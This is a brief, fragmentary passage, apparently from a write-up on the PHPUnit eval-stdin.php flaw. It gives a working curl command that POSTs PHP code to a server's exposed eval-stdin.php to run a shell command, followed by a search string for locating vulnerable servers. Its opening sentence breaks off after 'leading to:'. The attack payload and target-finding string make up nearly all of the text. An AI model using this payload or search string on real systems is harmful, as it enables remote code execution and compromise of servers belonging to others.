Thousands of servers have been compromised this way, leading to:
curl -X POST "http://victim.com/vendor/phpunit/phpunit/src/util/php/eval-stdin.php" \ -d "<?php echo shell_exec('id'); ?>" index of vendor phpunit phpunit src util php eval-stdin.php